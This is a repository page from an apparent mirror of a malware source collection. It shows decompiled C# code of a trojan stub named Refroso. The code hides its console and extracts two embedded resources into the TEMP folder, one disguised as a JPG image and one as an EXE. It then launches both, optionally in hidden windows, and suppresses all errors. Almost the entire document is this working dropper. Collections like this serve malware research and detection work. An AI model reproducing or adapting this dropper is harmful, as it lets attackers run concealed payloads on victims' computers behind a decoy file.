ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 03:16:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan/Win32/R/Trojan.Win32.Refroso.hsun-1e7b6217c18613020d2b48d9d7a44991a8b2402c5d71cf4d2d75d96b3e826999/Program.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

68 lines
3.0 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: Stub.Program
// Assembly: 6665, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 3EA7F22F-E93D-4997-88DA-D77E5698AEDE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Refroso.hsun-1e7b6217c18613020d2b48d9d7a44991a8b2402c5d71cf4d2d75d96b3e826999.exe
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
namespace Stub
{
internal class Program
{
public static FileStream F1Stream;
public static FileStream F2Stream;
[DllImport("kernel32.dll")]
public static extern bool FreeConsole();
private static void Main(string[] args)
{
try
{
Program.FreeConsole();
bool flag1 = false;
bool flag2 = true;
bool flag3 = false;
bool flag4 = false;
bool flag5 = true;
bool flag6 = false;
Stream manifestResourceStream1 = Assembly.GetExecutingAssembly().GetManifestResourceStream("1.txt");
byte[] buffer1 = new byte[manifestResourceStream1.Length];
manifestResourceStream1.Read(buffer1, 0, buffer1.Length);
manifestResourceStream1.Close();
Stream manifestResourceStream2 = Assembly.GetExecutingAssembly().GetManifestResourceStream("2.txt");
byte[] buffer2 = new byte[manifestResourceStream2.Length];
manifestResourceStream2.Read(buffer2, 0, buffer2.Length);
Program.F1Stream = !flag2 ? (!flag3 ? new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\1.exe", FileMode.Create) : new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\1.mp3", FileMode.Create)) : new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\1.jpg", FileMode.Create);
Program.F1Stream.Write(buffer1, 0, buffer1.Length);
Program.F1Stream.Close();
Program.F1Stream.Dispose();
Program.F2Stream = !flag4 ? new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\2.exe", FileMode.Create) : new FileStream(Environment.GetEnvironmentVariable("TEMP") + "\\2.bat", FileMode.Create);
Program.F2Stream.Write(buffer2, 0, buffer2.Length);
Program.F2Stream.Close();
Program.F2Stream.Dispose();
Process process1 = new Process();
process1.StartInfo.FileName = !flag2 ? (!flag3 ? Environment.GetEnvironmentVariable("TEMP") + "\\1.exe" : Environment.GetEnvironmentVariable("TEMP") + "\\1.mp3") : Environment.GetEnvironmentVariable("TEMP") + "\\1.jpg";
if (flag6)
process1.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process1.Start();
if (flag5)
process1.WaitForExit();
Process process2 = new Process();
process2.StartInfo.FileName = !flag4 ? Environment.GetEnvironmentVariable("TEMP") + "\\2.exe" : Environment.GetEnvironmentVariable("TEMP") + "\\2.bat";
if (flag1)
process2.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process2.Start();
}
catch
{
}
}
}
}
Reference in New Issue View Git Blame Copy Permalink